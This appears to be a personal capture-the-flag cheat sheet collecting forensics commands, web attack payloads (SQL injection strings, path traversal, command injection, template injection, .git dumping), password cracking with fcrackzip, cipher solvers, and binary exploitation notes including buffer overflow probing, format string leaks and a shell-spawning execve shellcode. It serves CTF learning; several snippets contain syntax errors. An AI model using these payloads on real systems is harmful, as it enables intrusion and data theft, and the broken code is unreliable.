· 6 years ago · Mar 12, 2019, 01:28 AM
1
2*NESTED LOOP IN LINUX
3for f in ./*; do for i in ./*/*; do if ^Ccho $i; wc -c < $i; done; done
4
5*SIZE OF FILES IN BYTES
6wc -c < filename
7
8
9
10
11
12-----
13
14
15file : to get file type
16
17unzip
18
19eog : to see pictures
20
21convert .png -scale 300% output.png => resize image
22
23tesseract .png out : extract txt from image
24
25
26------------
27script to go into zip file recursively:
28nano script.sh
29-
30#!/bin/bash
31
32while [1];
33do
34ls | grep -v "zip" | grep -v "zip" | grep -v "script.sh" | while read $line;
35do
36 mv $line $line.zip
37 unzip $line.zip
38done
39
40done
41-
42chmod +x script.sh
43
44
45---------
46=> if zip file require a password use fcrackzip to get pwd:
47
48locate rockyou.txt
49cp path .
50fcrackzip -D -u -p rockyou.txt file.zip
51
52-----------
53
54If it ask for a file try to move on the path for example : ../flag
55
56-----------
57
58binwalk -e file : to extract from file
59
60----
61SQL injection:
62test' UNION SELECT 1,2 --
63test' SELECT (SELECT secret from table) ,2 --
64
65-------
66strings file | less : to get strings from file
67
68=====
69WEB
70=====
71
72LAPD injection if we see OU CN .. use repo git payloadsallthethings
73-------
74ROBOTS.TXT
75website-url/robots.txt from the root of the webserver
76
77----
78CSS
79Check CSS file in sources
80
81OR JAVASCRIPT file
82
83check path /Flag.txt Flag.php
84---
85Scan web site security
86nikto -h "website"
87
88----
89
90EDIT COOKIE
91use cookie editor to add a new cookie name +value=ex:admin
92----
93
94***python script example for looping into url link
95
96#!usr/bin/env python
97
98import request
99import re
100
101url="http://..."
102firstPage= '/fp/'
103
104s=requests.Session()
105
106r= s.get(url+firstPage) //r=response
107
108counter=1
109while (1):
110 nextPage = re.findall(r'matchedword"(.*?)"', r.text)[0]
111 r= s.get(url+nextPage)
112 print(counter + r.text
113 counter +=1
114
115------------------------
116
117Inspect element + check cookie
118
119---------------------------hh
120Curl website
121
122curl -X OPTIONS "https://../" : to get options
123
124if username et pwd required:
1251)curl -X POST "https://../" --data username=admin\&password=admin -u admin:admin
1262)curl -X PUT "https://../" --data username=admin\&password=admin -u admin:admin
1273)curl -X DELETE "https://../" --data username=admin\&password=admin -u admin:admin
128
129-----------------------------
130***pyScript for SQL injection by sending POST to website
131
132
133#!usr/bin/env python
134
135import request
136
137url="http://..."
138firstPage= '/fp/'
139
140s=requests.Session()
141
142data= {
143 "email":"test",
144 "secret_table OR 1=1 --" : "" //then replace by ..OR username='admin' --"
145}
146
147r= s.post(url, data= data) //r=response
148print(r.text)
149s.close()
150
151----------------------------
152
153***network query to scrolldown html page
154
155in network tag enter following query:
156window.setInterval(function(){window.scrollBylines(1000)},1)
157
158inspect size of response to find flag, sort by size
159
160------------------------------
161
162***check web root of the website , APACHE if we have .php file // local file inclusion in website
163
164modify param URL=> /?lang=../../../../../var/www/html/flag.txt
165
166
167-----------------------
168
169****decode base64
170
171echo "ahgajdehGHAJGH" | base64 -d
172
173--------------------
174
175***Command injection
176
177use => ; to mark the end of command and add new cmd such as ls / ls .. to navigate and find the flag
178ex: ; ls ../Flag.txt
179
180
181-----------------
182
183***User Agent to get web browser version
184
185strings data.pcap | grep -i "user-agent"
186
187google : user agent lookup -> to decode version
188
189
190------------------
191
192***modify request header to login
193
194go into the network tab, right click -> copy as curl -> then modify in CLI
195
196
197------------
198
199***SQL INJECTION login page
200put payloads in both fields user and pwd
201google to find some payloads try :
202' OR 1=1 --
203' OR 1=1 hashtag
204' OR 1=1 /
205...
206sometime it logs you as admin because admin is the first elemnt of the table
207
208
209
210----------
211
212****download as much as possible from the found .git repository from webservers
213
214use git repo
215gitdumper.sh "url/.git/" source
216
217cd source
218git log
219git show shahashIDnumber and we get the source code of the page
220+ use grep "flag"
221
222----------------
223
224****Regex into input box
225
226try * . ^ to see if it use regex , to get the flag can try .* which means give evrything recursively
227
228
229
230--------------
231****header exploit
232
233check network tab
234look for suspicious elements
235look content-type ex: jpeg image with content-type : text/css is strange => copy as curl
236
237supposed to get jpg image but get css, then replace text/plain to get txt
238
239---------------
240
241***MAnual HTTP Request
242
243GET / HTTP/1.1
244Host: host
245
246-
247GET /login HTTP/1.1
248Host: host
249-
250POST /login HTTP/1.1
251Host: host
252Content-Type: application/x-www-form-urlencoded
253Content-Length: 10
254
255user=admin&pass=admin
256-
257use cookie to log in from the root /
258
259GET / HTTP/1.1
260Host: host
261Cookie: cookiename=value; Path=/
262Content-Length: 10
263
264user=admin&pass=admin
265
266---------
267
268*** FLASK SERVER SIDE TEMPLATE INJECTION (SSTI)
269{{7*7}} into input box to see if it will compute res
270then {{config}} to get the SECRET_KEY
271
272-----
273
274****httpS:
275check the certificate !!!
276add execpetion
277
278
279
280
281==============
282CRYPOT
283==============
284
285*** XOR CRYPTO
286python script:
287
288import pwn
289
290with open('filename.txt', r) as fd:
291 cipher = r.read()
292
293 cipher = cipher.decode('base64') //to decode base64
294 for i in range (256):
295 print(pwn.xor(cipher,i))
296
297
298-----------------------------------
299
300***VIGENERE CIPHER
301
302from string import uppercase
303
304key='072...3'
305
306flag=""
307
308with open("cipher.txt", r) as fd:
309 msg = fd.read()
310 counter = 0
311 for char in msg:
312 char= char.upper() //convert to uppercase
313
314 if (char in uppercase):
315 index= uppercase.index(char)
316 offset= int( key[counter % len(key)] )
317 new_char= uppercase[index-offset]
318 flag+=new_char
319 counter+=1
320 else:
321 flag+=char
322
323print(flag)
324
325WHITOUT KEY try :
326or use https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx to decrypt online
327
328-------------------------
329
330***connect to ip host and port with netcat
331nc ip port
332
333connect.sh
334
335#!/bin/bash
336
337nc ip port
338
339chmod +x connect.sh
340./connect.sh
341
342
343--------------------
344
345***python script to send data to input (user & code) //incorrect pwd=> it asks again for pwd
346host= 'ip..'
347port= 8080
348
349user ='admin'
350
351s= remote(host,port)
352s.recv()
353s.sendline(user)
354s.recv()
355s.sendline("testcode")ro
356
357for i in range(1000):
358 s.recv()
359 ....
360 compute code...
361 ...
362 print(i, code)
363 s.sendline(code)
364
365------------
366
367*** CRACK MD5 HASH
368google hash cracker -> crackstation.net
369
370-------------
371
372****CLASSIC RSA !!!
373google : factordb.com to fin p and q from n ! or also alpertron.com
374
375then use ./tools/rsa.py
376
377
378-------------
379***CAESAR CIPHER shift
380caesar, rot13 to decrypt caesar cipher => rot13.com
381
382for i in {0..26}; do echo $i; ....$i; done | less
383
384
385------------------
386
387*** SUBSTITUTE cipher
388
389use quipqiup.com to crack substitution cipher
390cipherToolDecrypt.py
391
392
393----------------
394
395***BINARY TO ASCII TEXT
396
397hex( int('0100101...',2) )[2:].decode('hex')
398
399
400
401
402
403--------------
404
405*** AES: decrypt AES cipher (mode ECB) from cipher and key
406
407use decryptAES.py
408
409---------------
410
411*** CRACK HASH PASSWORD:
412
413google hashkiller.com
414
415
416
417
418
419
420
421======================
422BINARY EXPLOIT
423======================
424
425*** use app Hopper Disass
426
427------------
428
429*** HEXdecimal value TO LITTLE ENDIAN
430import pwn
431
432pwn.p32(hex)
433
434-------------
435
436***BUFFER OVERFLOW
437
438script
439
440from pwn import *
441
442s = remote('.. .com', portnbr)
443
444print(s.recv())
445while (1):
446 print(s.recv())
447 sendline('1'*100) """in order to overwrite admin=0 with 1
448
449
450s.close()
451
452
453------------
454
455*** strings on the program
456
457--------------
458
459*** BASIC BUFFER OVERFLOW
460
461./program
462try strings on it
463
464readelf -s program //to look at the symbol of the binary
465we can look for only FUNCT symbol:
466readelf -s program | grep -i "FUNC"
467
468we can get address of secret function in hex
469
470To see if there is buffer overflow:
471send a lot of data
472
473dmesg | tail //to get only the end
474
475try to send multiple A until finding where we don't have a segmentation fault !
476python -c "print 'A'*50 " | ./program
477python -c "print 'A'*30 " | ./program
478dmesg | tail
479python -c "print 'A'*32 " | ./program //Should see 41414141
480python -c "print 'A'*32+'BBBB' " | ./program //Should see 42424242
481
482just replace by the address in litle endien of where we would jump
483python -c "print 'A'*32+ litleendianAdresse " | ./program
484
485
486------
487
488***BUFFER OVERFLOW with call to FUNCTION => SHELLCODE
489we can use pwntools to developp our own shell code
490
491use file to check the binary architecture=>Intel80386
492
493use asm to get the assembly code of the shellcode, can be used to call a fct
494
495import pwn
496
497fctAdress=08050403
498
499shellcode = pwn.asm('push 08050403; ret ') //put to assembly code =>push memory adress on the stack and return to it
500
501
502python -c "print shellcode " | ./program
503
504*or we can try to craft our shellcode with pwn
505
506import pwn
507
508shellcode = pwn.asm( pwn.shellcraft.i386.linux.cat('flag') )
509
510python -c "print shellcode " | ./program
511
512
513****** or google shellcode shell-storm to find a lot of shellcode *****
514Linux x86 - execve("/bin/bash", ["/bin/bash", "-p"], NULL) - 33 bytes
515
516shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"
517
518python -c "print shellcode " | ./program
519
520the shell will work but we die after it, to keep it use:
521
522(python -c "print '..shellcode..' "; cat) | ./program
523then use cmd such as:
524ls
525cat flag.txt
526
527
528----------------------------------
529
530***TWO COMPLEMENT
531
532if unsigned variable
533if strol
534we can use the negative value
535
536
537bin(hex) = 10 == 2 in decimal
538then the two complement is the negative value
539to get it, swap binary and add 1
540ex: 010 become 101+1 = 110 = -2 in decimal
541
542should be represented in 32 bit or 64
543code:
544
545binary = bin(intValue)[2:].replace('1','x').replace('0','1').replace('x','0')
546
547newInt = '0b' + binary + 1
548
549put a negative (-) in front of new Int value
550
551
552----------------------------
553
554*** in MAN pages you can use ! to get access to the shell
555after that: whoami , ls ...
556
557--------------
558
559*** TRY SPENDING A NEGATIVE AMOOUNT OF MONEY !
560
561---------------
562
563
564*** FORMAT STRING ATTACK : printf in C EXPLOIT!
565google format string attack -> owasp
566program asks input and print it
567can exploit it, if printf has no second argument, -> printf(myInput)
568payload :
569send :
570%x for to read data from stack
571%p to read pointer from stack
572..
573
574
575we can use this for example to read secret from stack !!
576send a lot of %p %p %p into input
577
578
579
580can use gcc to compile the original source code:
581gcc -g -m32 code.c -o newbin //use -g for debug and -m32 to get in 32bits binary, -o for output file name
582//compile to detect if source code correct, can get some warnings for example !!
583
584then use:
585 gdb ./newbin
586
587disas main //give the name of fct
588b *0x98...hex //use to break att hex adress
589r //to run
590p secret //use p to print value of secret !!!
591
592c //to continu program
593
594
595so we know secret on the stacl
596
597with printf we can specify which offset of the stack we want,
598ex: 8 value on the stack=position => %8$p =>get secret
599
600
601--------------------------
602
603*** BASH COMMAND INJECTION
604
605close the command with "; or just ; and use after that , ls cat flag.txt
606
607
608------------
609
610***STINGS ON BINARY!
611
612-------------
613
614*** GETS!!!!!!!!!!!!!BUFFER OVERFLOW
615
616IF we have something
617int admin = 0
618char username [16]
619+
620GETS(username)
621
622-> then overflow with 'A'* 16 ! we can replace A with \x1 to OVERFLOWe with 1 admin=1 !
623
624
625python -c "print '\x1'* 17 "; cat) | ./program
626ls
627cat flag.txt
628
629----------------
630
631****MODIFY BINARY WITH PWNTOOLS!!!!!!!!!!!!!
632
633first inspect with hoppper
634then readelf -s program //to get function name, adress
635
636if we have bin we can try to modify some function by using
637modifyBin.py and pwntools ELF !
638
639
640
641----------------
642
643*****PRINTF BUFFER OVERFLOW if no second parameter